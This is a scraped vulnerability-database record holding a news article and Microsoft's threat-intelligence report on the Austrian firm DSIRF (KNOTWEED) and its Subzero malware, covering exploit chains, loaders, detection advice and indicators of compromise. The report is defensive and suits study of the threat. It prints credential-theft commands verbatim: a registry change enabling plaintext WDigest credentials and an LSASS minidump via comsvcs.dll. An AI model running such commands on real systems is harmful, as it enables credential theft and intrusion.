DATABASE RESOURCES PRICING ABOUT US

{"id": "THN:DFA2CC41C78DFA4BED87B1410C21CE2A", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Microsoft Uncovers Austrian Company Exploiting Windows and Adobe Zero-Day Exploits", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjRrnxKtJzXQbaLrPRY2GEIij8so07HImMs9wbPTTP-j92ED6wxTFv-NdQyw_Z0JBlqIYh-H3g2WKAcIkt70zKcB5AxP9KcQgCqChBwNsYPu9CQ_Xp6uBmkhxyoNZpHZIIQrV5TkreAFNBg-kFpOzjxBYxhl5bZqKZH6j9zgyd3itncGVyM5L09fy-c/s728-e100/windows-hacker.jpg>)\n\nA cyber mercenary that \"ostensibly sells general security and information analysis services to commercial customers\" used several Windows and Adobe zero-day exploits in limited and highly-targeted attacks against European and Central American entities.\n\nThe company, which Microsoft describes as a private-sector offensive actor (PSOA), is an Austria-based outfit called [DSIRF](<https://web.archive.org/web/20220713203741/https:/dsirf.eu/about/>) that's linked to the development and attempted sale of a piece of cyberweapon referred to as **Subzero**, which can be used to hack targets' phones, computers, and internet-connected devices.\n\n\"Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama,\" the tech giant's cybersecurity teams [said](<https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/>) in a Wednesday report.\n\nMicrosoft is [tracking](<https://blogs.microsoft.com/on-the-issues/2022/07/27/private-sector-cyberweapons-psoas-knotweed/>) the actor under the moniker KNOTWEED, continuing its trend of terming PSOAs using names given to trees and shrubs. The company previously designated the name [SOURGUM](<https://thehackernews.com/2021/07/israeli-firm-helped-governments-target.html>) to Israeli spyware vendor Candiru.\n\nKNOTWEED is known to dabble in both access-as-a-service and [hack-for-hire](<https://thehackernews.com/2022/06/google-blocks-dozens-of-malicious.html>) operations, offering its toolset to third parties as well as directly associating itself in certain attacks.\n\nWhile the former entails the sales of end-to-end hacking tools that can be used by the purchaser in their own operations without the involvement of the offensive actor, hack-for-hire groups run the targeted operations on behalf of their clients.\n\nThe deployment of Subzero is said to have transpired through the exploitation of numerous issues, including an attack chain that abused an unknown Adobe Reader remote code execution (RCE) flaw and a zero-day privilege escalation bug ([CVE-2022-22047](<https://thehackernews.com/2022/07/microsoft-releases-fix-for-zero-day.html>)), the latter of which was addressed by Microsoft as part of its July Patch Tuesday updates.\n\n\"The exploits were packaged into a PDF document that was sent to the victim via email,\" Microsoft explained. \"CVE-2022-22047 was used in KNOTWEED related attacks for privilege escalation. The vulnerability also provided the ability to escape sandboxes and achieve system-level code execution.\"\n\nSimilar attack chains observed in 2021 leveraged a combination of two Windows privilege escalation exploits (CVE-2021-31199 and CVE-2021-31201) in conjunction with an Adobe reader flaw (CVE-2021-28550). The three vulnerabilities were [resolved](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>) in June 2021.\n\nThe deployment of Subzero subsequently occurred through a fourth exploit, this time taking advantage of a privilege escalation vulnerability in the Windows Update Medic Service ([CVE-2021-36948](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>)), which was closed by Microsoft in August 2021.\n\nBeyond these exploit chains, Excel files masquerading as real estate documents have been used as a conduit to deliver the malware, with the files containing [Excel 4.0 macros](<https://thehackernews.com/2022/01/emotet-now-using-unconventional-ip.html>) designed to kick-start the infection process.\n\nRegardless of the method employed, the intrusions culminate in the execution of shellcode, which is used to retrieve a second-stage payload called Corelump from a remote server in the form of a JPEG image that also embeds a loader named Jumplump that, in turn, loads Corelump into memory.\n\nThe evasive implant comes with a wide range of capabilities, including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins downloaded from the remote server.\n\nAlso deployed during the attacks were bespoke utilities like Mex, a command-line tool to run open source security software like Chisel, and PassLib, a tool to dump credentials from web browsers, email clients, and the Windows credential manager.\n\nMicrosoft said it uncovered KNOTWEED actively serving malware since February 2020 through infrastructure hosted on DigitalOcean and Choopa, alongside identifying subdomains that are used for malware development, debugging Mex, and staging the Subzero payload.\n\nMultiple links have also been unearthed between DSIRF and the malicious tools used in KNOTWEED's attacks.\n\n\"These include command-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF,\" Redmond noted.\n\nSubzero is no different from off-the-shelf malware such as [Pegasus](<https://thehackernews.com/2022/07/pegasus-spyware-used-to-hack-devices-of.html>), [Predator](<https://thehackernews.com/2022/05/cytroxs-predator-spyware-target-android.html>), [Hermit](<https://thehackernews.com/2022/06/google-says-isps-helped-attackers.html>), and [DevilsTongue](<https://thehackernews.com/2022/07/candiru-spyware-caught-exploiting.html>), which are capable of infiltrating phones and Windows machines to remotely control the devices and siphon off data, sometimes without requiring the user to click on a malicious link.\n\nIf anything, the latest findings highlight a burgeoning international market for such sophisticated surveillance technologies to carry out targeted attacks aimed at members of civil society.\n\nAlthough companies that sell commercial spyware advertise their wares as a means to tackle serious crimes, evidence gathered so far has found [several instances](<https://thehackernews.com/2022/06/nso-confirms-pegasus-spyware-used-by-at.html>) of these tools being misused by authoritarian governments and private organizations to snoop on human rights advocates, journalists, dissidents, and politicians.\n\nGoogle's Threat Analysis Group (TAG), which is tracking over 30 vendors that hawk exploits or surveillance capabilities to state-sponsored actors, said the booming ecosystem underscores \"the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments.\"\n\n\"These vendors operate with deep technical expertise to develop and operationalize exploits,\" TAG's Shane Huntley [said](<https://blog.google/threat-analysis-group/googles-efforts-to-identify-and-counter-spyware/>) in a testimony to the U.S. House Intelligence Committee on Wednesday, adding, \"its use is growing, fueled by demand from governments.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2022-07-28T11:18:00", "modified": "2022-07-29T02:58:07", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 7.2}, "severity": "HIGH", "exploitabilityScore": 3.9, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://thehackernews.com/2022/07/microsoft-uncover-austrian-company.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-36948", "CVE-2022-22047"], "immutableFields": [], "lastseen": "2022-07-29T03:59:29", "viewCount": 52, "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "adobe", "idList": ["APSB21-29"]}, {"type": "attackerkb", "idList": ["AKB:0B6E13D5-84E0-4D3E-BD21-781032FA30ED", "AKB:132606CF-7B8C-4EE8-BE1C-308811E7B813", "AKB:50EC30BE-5E8C-4158-8AA0-06397441F8A5", "AKB:D92D1688-7724-40C4-AD86-DF44F4611D40", "AKB:DBAEA288-D224-49E1-877D-628DFD1CF161"]}, {"type": "avleonov", "idList": ["AVLEONOV:3530747E605445686B7211B2B0853579", "AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE", "AVLEONOV:B87691B304EF70215B926F66B871260A"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0278", "CPAI-2021-0314", "CPAI-2021-0317", "CPAI-2021-0508", "CPAI-2022-0362"]}, {"type": "cve", "idList": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-36948", "CVE-2022-22026", "CVE-2022-22047", "CVE-2022-22049"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hivepro", "idList": ["HIVEPRO:1BBAC0CD5F3681EC49D06BE85DC90A92"]}, {"type": "kaspersky", "idList": ["KLA12198", "KLA12202", "KLA12259", "KLA12580", "KLA12581"]}, {"type": "krebs", "idList": ["KREBS:4D5B2D5FA1A6E077B46D7F3051319E72", "KREBS:AE87E964E683A56CFE4E51E96F3530AD", "KREBS:E374075CAB55D7AB06EBD73CB87D33CD"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:84CB84E43C5F560FDE9B8B7E65F7C4A3", "MALWAREBYTES:90BD6A9BB937B6617FDC4FE73A86B38A", "MALWAREBYTES:9F3181D8BD5EF0E44A305AF69898B9E0"]}, {"type": "mmpc", "idList": ["MMPC:85647D37E79AFEF2BFF74B4682648C5E"]}, {"type": "mscve", "idList": ["MS:CVE-2021-31199", "MS:CVE-2021-31201", "MS:CVE-2021-36948", "MS:CVE-2022-22026", "MS:CVE-2022-22047", "MS:CVE-2022-22049"]}, {"type": "mskb", "idList": ["KB5005030", "KB5005031", "KB5005033", "KB5015874", "KB5015877"]}, {"type": "mssecure", "idList": ["MSSECURE:85647D37E79AFEF2BFF74B4682648C5E"]}, {"type": "nessus", "idList": ["ADOBE_ACROBAT_APSB21-29.NASL", "ADOBE_READER_APSB21-29.NASL", "MACOS_ADOBE_ACROBAT_APSB21-29.NASL", "MACOS_ADOBE_READER_APSB21-29.NASL", "SMB_NT_MS21_AUG_5005030.NASL", "SMB_NT_MS21_AUG_5005031.NASL", "SMB_NT_MS21_AUG_5005033.NASL", "SMB_NT_MS21_JUN_5003635.NASL", "SMB_NT_MS21_JUN_5003637.NASL", "SMB_NT_MS21_JUN_5003638.NASL", "SMB_NT_MS21_JUN_5003646.NASL", "SMB_NT_MS21_JUN_5003681.NASL", "SMB_NT_MS21_JUN_5003687.NASL", "SMB_NT_MS21_JUN_5003694.NASL", "SMB_NT_MS21_JUN_5003695.NASL", "SMB_NT_MS21_JUN_5003697.NASL", "SMB_NT_MS22_JUL_5015807.NASL", "SMB_NT_MS22_JUL_5015808.NASL", "SMB_NT_MS22_JUL_5015811.NASL", "SMB_NT_MS22_JUL_5015814.NASL", "SMB_NT_MS22_JUL_5015827.NASL", "SMB_NT_MS22_JUL_5015832.NASL", "SMB_NT_MS22_JUL_5015862.NASL", "SMB_NT_MS22_JUL_5015870.NASL", "SMB_NT_MS22_JUL_5015875.NASL", "SMB_NT_MS22_JUL_5015877.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950", "QUALYSBLOG:23EF75126B24C22C999DAD4D7A2E9DF5", "QUALYSBLOG:65C282BB0F312A3AD8A043024FD3D866", "QUALYSBLOG:A8EE36FB3E891C73934CB1C60E3B3D41", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:B54637535A9D368B19D4D9881C6C34B3", "RAPID7BLOG:DE426F8A59CA497BB6C0B90C0F1849CD", "RAPID7BLOG:E44F025D612AC4EA5DF9F2B56FF8680C"]}, {"type": "securelist", "idList": ["SECURELIST:BB0230F9CE86B3F1994060AA0A809C08"]}, {"type": "talosblog", "idList": ["TALOSBLOG:F032D3BBC6D695272384D4A3821130BF"]}, {"type": "thn", "idList": ["THN:1DDE95EA33D4D9F304973569FC787451", "THN:8243BE07E124CAD984B8B4895550A7CC", "THN:8C2FBC83F6EC62900F1887F00903447F", "THN:F601EBBE359B3547B8E79F0217562FEF"]}, {"type": "threatpost", "idList": ["THREATPOST:474207FB444B779CD6B86ABEA0D24054", "THREATPOST:61CC1EAC83030C2B053946454FE77AC3", "THREATPOST:781705ADC10B0D40FC4B8D835FA5EA6D", "THREATPOST:8D4EA8B0593FD44763915E703BC9AB72"]}, {"type": "veracode", "idList": ["VERACODE:31029"]}]}, "epss": [{"cve": "CVE-2021-28550", "epss": "0.713430000", "percentile": "0.974700000", "modified": "2023-03-19"}, {"cve": "CVE-2021-31199", "epss": "0.000490000", "percentile": "0.154080000", "modified": "2023-03-19"}, {"cve": "CVE-2021-31201", "epss": "0.000490000", "percentile": "0.154080000", "modified": "2023-03-19"}, {"cve": "CVE-2021-36948", "epss": "0.001340000", "percentile": "0.467800000", "modified": "2023-03-19"}, {"cve": "CVE-2022-22047", "epss": "0.000560000", "percentile": "0.214740000", "modified": "2023-03-19"}], "vulnersScore": -0.4}, "_state": {"score": 1684014897, "dependencies": 1659988328, "epss": 1679301741}, "_internal": {"score_hash": "2179c2e5c8cf92f230900ff90911fd71"}}

{"mmpc": [{"lastseen": "2022-07-27T17:42:56", "description": "The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) found a private-sector offensive actor (PSOA) using multiple Windows and Adobe 0-day exploits, including one for the recently patched [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), in limited and targeted attacks against European and Central American customers. The PSOA, which MSTIC tracks as KNOTWEED, developed malware called Subzero which was used in these attacks.\n\nThis blog details Microsoft\u2019s analysis of the observed KNOTWEED activity and related malware used in targeted attacks against our customers. This information is shared with our customers and industry partners to improve detection of these attacks. Customers are encouraged to expedite deployment of the July 2022 Microsoft security updates to protect their systems against exploits using CVE-2022-22047. Microsoft Defender Antivirus and Microsoft Defender for Endpoint have also implemented detections against KNOTWEED\u2019s malware and tools.\n\nPSOAs, which [Microsoft also refers to as cyber mercenaries](<https://blogs.microsoft.com/on-the-issues/2022/07/27/private-sector-cyberweapons-psoas-knotweed/>), sell hacking tools or services through a variety of business models. Two common models for this type of actor are access-as-a-service and hack-for-hire. In access-as-a-service, the actor sells full end-to-end hacking tools that can be used by the purchaser in operations, with the PSOA not involved in any targeting or running of the operation. In hack-for-hire, detailed information is provided by the purchaser to the actor, who then runs the targeted operations. Based on observed attacks and news reports, MSTIC believes that KNOTWEED may blend these models: they sell the Subzero malware to third parties but have also been observed using KNOTWEED-associated infrastructure in some attacks, suggesting more direct involvement.\n\n## Who is KNOTWEED?\n\nKNOTWEED is an Austria-based PSOA named DSIRF. The [DSIRF website](<https://web.archive.org/web/20220713203741/https:/dsirf.eu/about/>) [web archive link] says they provide services_ \u201cto multinational corporations in the technology, retail, energy and financial sectors_\u201d and that they have \u201c_a set of highly sophisticated techniques in gathering and analyzing information._\u201d They publicly offer several services including \u201c_an enhanced due diligence and risk analysis process through providing a deep understanding of individuals and entities\u201d _and _\u201chighly sophisticated Red Teams to challenge your company&#x27;s most critical assets.\u201d_ \n \nHowever, [multiple](<https://www.intelligenceonline.com/surveillance--interception/2022/04/06/after-finfisher-s-demise-berlin-explores-cyber-tool-options,109766000-art>) [news](<https://www.focus.de/politik/vorab-aus-dem-focus-volle-kontrolle-ueber-zielcomputer-das-raetsel-um-die-spionage-app-fuehrt-ueber-wirecard-zu-putin_id_24442733.html>) [reports](<https://netzpolitik.org/2021/dsirf-wir-enthuellen-den-staatstrojaner-subzero-aus-oesterreich>) have linked DSIRF to the development and attempted sale of a malware toolset called Subzero. MSTIC found the Subzero malware being deployed through a variety of methods, including 0-day exploits in Windows and Adobe Reader, in 2021 and 2022. As part of our investigation into the utility of this malware, Microsoft\u2019s communications with a Subzero victim revealed that they had not commissioned any red teaming or penetration testing, and confirmed that it was unauthorized, malicious activity. Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama. It\u2019s important to note that the identification of targets in a country doesn\u2019t necessarily mean that a DSIRF customer resides in the same country, as international targeting is common.\n\nMSTIC has found multiple links between DSIRF and the exploits and malware used in these attacks. These include command-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF.\n\n## Observed actor activity\n\n### KNOTWEED initial access\n\nMSTIC found KNOTWEED\u2019s Subzero malware deployed in a variety of ways. In the succeeding sections, the different stages of Subzero are referred to by their Microsoft Defender detection names: _Jumplump _for the persistent loader and _Corelump _for the main malware.\n\n#### KNOTWEED exploits in 2022\n\nIn May 2022, MSTIC found an Adobe Reader remote code execution (RCE) and a 0-day Windows privilege escalation exploit chain being used in an attack that led to the deployment of Subzero. The exploits were packaged into a PDF document that was sent to the victim via email. Microsoft was not able to acquire the PDF or Adobe Reader RCE portion of the exploit chain, but the victim\u2019s Adobe Reader version was released in January 2022, meaning that the exploit used was either a 1-day exploit developed between January and May, or a 0-day exploit. Based on KNOTWEED\u2019s extensive use of other 0-days, we assess with medium confidence that the Adobe Reader RCE is a 0-day exploit. The Windows exploit was analyzed by MSRC, found to be a 0-day exploit, and then patched in July 2022 as CVE-2022-22047. Interestingly, there were indications in the Windows exploit code that it was also designed to be used from Chromium-based browsers, although we\u2019ve seen no evidence of browser-based attacks.\n\nThe CVE-2022-22047 vulnerability is related to an issue with [activation context](<https://docs.microsoft.com/windows/win32/sbscs/activation-contexts>) caching in the Client Server Run-Time Subsystem (CSRSS) on Windows. At a high level, the vulnerability could enable an attacker to provide a crafted assembly manifest, which would create a malicious activation context in the activation context cache, for an arbitrary process. This cached context is used the next time the process spawned.\n\nCVE-2022-22047 was used in KNOTWEED related attacks for privilege escalation. The vulnerability also provided the ability to escape sandboxes (with some caveats, as discussed below) and achieve system-level code execution. The exploit chain starts with writing a malicious DLL to disk from the sandboxed Adobe Reader renderer process. The CVE-2022-22047 exploit was then used to target a system process by providing an application manifest with an undocumented attribute that specified the path of the malicious DLL. Then, when the system process next spawned, the attribute in the malicious activation context was used, the malicious DLL was loaded from the given path, and system-level code execution was achieved.\n\nIt&#x27;s important to note that exploiting CVE-2022-22047 requires attackers to be able to write a DLL to disk. However, in the threat model of sandboxes, such as that of Adobe Reader and Chromium, the ability to write out files where the attacker _cannot_ control the path isn\u2019t considered dangerous. Hence, these sandboxes aren\u2019t a barrier to the exploitation of CVE-2022-22047.\n\n#### KNOTWEED exploits in 2021\n\nIn 2021, MSRC received a report of two Windows privilege escalation exploits ([CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>) and [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>)) being used in conjunction with an Adobe Reader exploit ([CVE-2021-28550](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>)), all of which were patched in June 2021. MSTIC was able to confirm the use of these in an exploit chain used to deploy Subzero.\n\nWe were later able to link the deployment of Subzero to a fourth exploit, one related to a Windows privilege escalation vulnerability in the Windows Update Medic Service ([CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>)), which allowed an attacker to force the service to load an arbitrary signed DLL. The malicious DLL used in the attacks was signed by \u2018DSIRF GmbH\u2019.\n\nFigure 1. Valid digital signature from DSIRF on Medic Service exploit DLL\n\n#### Malicious Excel documents\n\nIn addition to the exploit chains, another method of access that led to the deployment of Subzero was an Excel file masquerading as a real estate document. The file contained a malicious macro that was obfuscated with large chunks of benign comments from the Kama Sutra, string obfuscation, and use of Excel 4.0 macros.\n\n Figure 2: Two examples of KNOTWEED Excel macro obfuscation\n\nAfter de-obfuscating strings at runtime, the VBA macro uses the _ExecuteExcel4Macro_ function to call native Win32 functions to load shellcode into memory allocated using _VirtualAlloc_. Each opcode is individually copied into a newly allocated buffer using _memset_ before _CreateThread_ is called to execute the shellcode.\n\nFigure 3: Copying opcodes Figure 4: Calling CreateThread on shellcode\n\nThe following section describes the shellcode executed by the macro.\n\n### KNOTWEED malware and tactics, techniques, and procedures (TTPs)\n\n#### Corelump downloader and loader shellcode\n\nThe downloader shellcode is the initial shellcode executed from either the exploit chains or malicious Excel documents. The shellcode&#x27;s purpose is to retrieve the _Corelump_ second-stage malware from the actor\u2019s command-and-control (C2) server. The downloader shellcode downloads a JPEG image that contains extra encrypted data appended to the end of the file (past the _0xFF 0xD9_ marker that signifies the end of a JPEG file). The JPEG is then written to the user\u2019s _%TEMP%_ directory.\n\nFigure 5: One of the images embedded with the loader shellcode and Corelump\n\nThe downloader shellcode searches for a 16-byte marker immediately following the end of JPEG. After finding the marker, the downloader shellcode RC4 decrypts the loader shellcode using the next 16 bytes as the RC4 key. Finally, the loader shellcode RC4 decrypts the _Corelump_ malware using a second RC4 key and manually loads it into memory.\n\n#### Corelump malware\n\n_Corelump _is the main payload and resides exclusively in memory to evade detection. It contains a variety of capabilities including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins downloaded from KNOTWEED\u2019s C2 server.\n\nAs part of installation, _Corelump_ makes copies of legitimate Windows DLLs and overwrites sections of them with malicious code. As part of this process, _Corelump_ also modifies the fields in the PE header to accommodate the nefarious changes, such as adding new exported functions, disabling [Control Flow Guard](<https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard>), and modifying the image file checksum with a computed value from _CheckSumMappedFile._ These trojanized binaries (_Jumplump_) are dropped to disk in _C:\\Windows\\System32\\spool\\drivers\\color\\_, and COM registry keys are modified for persistence (see the Behaviors section for more information on COM hijacking).\n\n#### Jumplump loader\n\n_Jumplump _is responsible for loading _Corelump _into memory from the JPEG file in the %TEMP% directory. If _Corelump_ is not present, _Jumplump_ attempts to download it again from the C2 server. Both_ Jumplump _and the downloader shellcode are heavily obfuscated to make analysis difficult, with most instructions being followed by a jmp to another instruction/jmp combination, giving a convoluted control flow throughout the program.\n\nFigure 6: Disassembly showing the jmp/instruction obfuscation used in Jumplump\n\n#### Mex and PassLib\n\nKNOTWEED was also observed using the bespoke utility tools Mex and PassLib. These tools are developed by KNOTWEED and bear capabilities that are derived from publicly available sources. Mex, for example, is a command-line tool containing several red teaming or security plugins copied from GitHub (listed below):\n\n[Chisel](<https://github.com/jpillora/chisel>)| [mimikatz](<https://github.com/ParrotSec/mimikatz>)| [SharpHound3](<https://github.com/BloodHoundAD/SharpHound3>) \n---|---|--- \n[Curl](<https://github.com/curl/curl>)| [Ping Castle](<https://github.com/vletoux/pingcastle>)| [SharpOxidResolver](<https://github.com/S3cur3Th1sSh1t/SharpOxidResolver>) \n[Grouper2](<https://github.com/l0ss/Grouper2>)| [Rubeus](<https://github.com/GhostPack/Rubeus>)| [PharpPrinter](<https://github.com/rvrsh3ll/SharpPrinter>) \n[Internal Monologue](<https://github.com/eladshamir/Internal-Monologue>)| [SCShell](<https://github.com/Mr-Un1k0d3r/SCShell>)| [SpoolSample](<https://github.com/leechristensen/SpoolSample>) \n[Inveigh](<https://github.com/Kevin-Robertson/Inveigh>)| [Seatbelt](<https://github.com/GhostPack/Seatbelt>)| [StandIn](<https://github.com/FuzzySecurity/StandIn>) \n[Lockless](<https://github.com/GhostPack/Lockless>)| [SharpExec](<https://github.com/anthemtotheego/SharpExec>)| \n \nPassLib is a custom password stealer tool capable of dumping credentials from a variety of sources including web browsers, email clients, LSASS, LSA secrets, and the Windows credential manager.\n\n#### Post-compromise actions\n\nIn victims where KNOTWEED malware had been used, a variety of post-compromise actions were observed:\n\n * Setting of _UseLogonCredential _to \u201c1\u201d to enable plaintext credentials:\n * _reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f_\n * Credential dumping via _comsvcs.dll_:\n * _rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump_\n * Attempt to access emails with dumped credentials from a KNOTWEED IP address\n * Using Curl to download KNOTWEED tooling from public file shares such as _vultrobjects[.]com_\n * Running PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF\n\n### KNOTWEED infrastructure connections to DSIRF\n\nPivoting off a known command-and-control domain identified by MSTIC, _acrobatrelay[.]com_, RiskIQ expanded the view of KNOTWEED&#x27;s attack infrastructure. Leveraging unique patterns in the use of SSL certificates and other network fingerprints specific to the group and associated with that domain, RiskIQ identified a host of additional IP addresses under the control of KNOTWEED. This infrastructure, largely hosted by Digital Ocean and Choopa, has been actively serving malware since at least February of 2020 and continues through the time of this writing.\n\nRiskIQ next utilized passive DNS data to determine which domains those IPs resolved to at the time they were malicious. This process yielded several domains with direct links to DSIRF, including _demo3[.]dsirf[.]eu_ (the company&#x27;s own website), and several subdomains that appear to have been used for malware development, including _debugmex[.]dsirflabs[.]eu_ (likely a server used for debugging malware with the bespoke utility tool Mex) and _szstaging[.]dsirflabs[.]eu_ (likely a server used to stage Subzero malware).\n\n## Detection and prevention\n\nMicrosoft will continue to monitor KNOTWEED activity and implement protections for our customers. The current detections and IOCs detailed below are in place and protecting Microsoft customers across our security products. Additional advanced hunting queries are also provided below to help organizations extend their protections and investigations of these attacks.\n\n### Behaviors\n\n_Corelump _drops the_ Jumplump_ loader DLLs to _C:\\Windows\\System32\\spool\\drivers\\color\\\\. _This is a common directory used by malware as well as some legitimate programs, so writes of PE files to the folder should be monitored.\n\n_Jumplump_ uses COM hijacking for persistence, modifying COM registry keys to point to the _Jumplump_ DLL in _C:\\Windows\\System32\\spool\\drivers\\color\\_. Modifications of default system CLSID values should be monitored to detect this technique (e.g., _HKLM\\SOFTWARE\\Classes\\CLSID\\\\{GUID}\\InProcServer32 Default_ value). The five CLSIDs used by _Jumplump_ are listed below with their original clean values on Windows 11:\n\n * {ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea} = &quot;_%SystemRoot%\\System32\\ApplicationFrame.dll_&quot;\n * {1f486a52-3cb1-48fd-8f50-b8dc300d9f9d} = &quot;_%SystemRoot%\\system32\\propsys.dll_&quot;\n * {4590f811-1d3a-11d0-891f-00aa004b2e24} = &quot;_%SystemRoot%\\system32\\wbem\\wbemprox.dll_&quot;\n * {4de225bf-cf59-4cfc-85f7-68b90f185355} = &quot;_%SystemRoot%\\system32\\wbem\\wmiprvsd.dll_&quot;\n * {F56F6FDD-AA9D-4618-A949-C1B91AF43B1A} = &quot;_%SystemRoot%\\System32\\Actioncenter.dll_&quot;\n\nMany of the post-compromise actions can be detected based on their command lines. Customers should monitor for possible malicious activity such as PowerShell executing scripts from internet locations, modification of commonly abused registry keys such as _HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest, _and LSASS credential dumping via minidumps.\n\n## Recommended customer actions\n\nThe techniques used by the actor and described in the Observed actor activity section can be mitigated by adopting the security considerations provided below:\n\n * All customers should prioritize patching of [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>).\n * Confirm that Microsoft Defender Antivirus is updated to security intelligence update **1.371.503.0** or later to detect the related indicators.\n * Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.\n * [Change Excel macro security settings](<https://support.microsoft.com/office/change-macro-security-settings-in-excel-a97c09d2-c082-46b8-b19f-e8621e8fe373>) to control which macros run and under what circumstances when you open a workbook. Customers can also [stop malicious XLM or VBA macros](<https://www.microsoft.com/security/blog/2021/03/03/xlm-amsi-new-runtime-defense-against-excel-4-0-macro-malware/>) by ensuring runtime macro scanning by Antimalware Scan Interface ([AMSI](<https://docs.microsoft.com/windows/win32/amsi/antimalware-scan-interface-portal>)) is on. This feature\u2014enabled by default\u2014is on if the Group Policy setting for Macro Run Time Scan Scope is set to \u201cEnable for All Files\u201d or \u201cEnable for Low Trust Files\u201d.\n * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. _Note:_ Microsoft strongly encourages all customers download and use password-less solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure accounts.\n * Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.\n\n## Indicators of compromise (IOCs)\n\nThe following list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems. All sample hashes are available in VirusTotal.\n\nIndicator| Type| Description \n---|---|--- \n78c255a98003a101fa5ba3f49c50c6922b52ede601edac5db036ab72efc57629| SHA-256| Malicious Excel document and VBA \n0588f61dc7e4b24554cffe4ea56d043d8f6139d2569bc180d4a77cf75b68792f| SHA-256| Malicious Excel document and VBA \n441a3810b9e89bae12eea285a63f92e98181e9fb9efd6c57ef6d265435484964| SHA-256| Jumplump malware \ncbae79f66f724e0fe1705d6b5db3cc8a4e89f6bdf4c37004aa1d45eeab26e84b| SHA-256| Jumplump malware \nfd6515a71530b8329e2c0104d0866c5c6f87546d4b44cc17bbb03e64663b11fc| SHA-256| Jumplump malware \n5d169e083faa73f2920c8593fb95f599dad93d34a6aa2b0f794be978e44c8206| SHA-256| Jumplump malware \n7f29b69eb1af1cc6c1998bad980640bfe779525fd5bb775bc36a0ce3789a8bfc| SHA-256| Jumplump malware \n02a59fe2c94151a08d75a692b550e66a8738eb47f0001234c600b562bf8c227d| SHA-256| Jumplump malware \n7f84bf6a016ca15e654fb5ebc36fd7407cb32c69a0335a32bfc36cb91e36184d| SHA-256| Jumplump malware \nafab2e77dc14831f1719e746042063a8ec107de0e9730249d5681d07f598e5ec| SHA-256| Jumplump malware \n894138dfeee756e366c65a197b4dbef8816406bc32697fac6621601debe17d53| SHA-256| 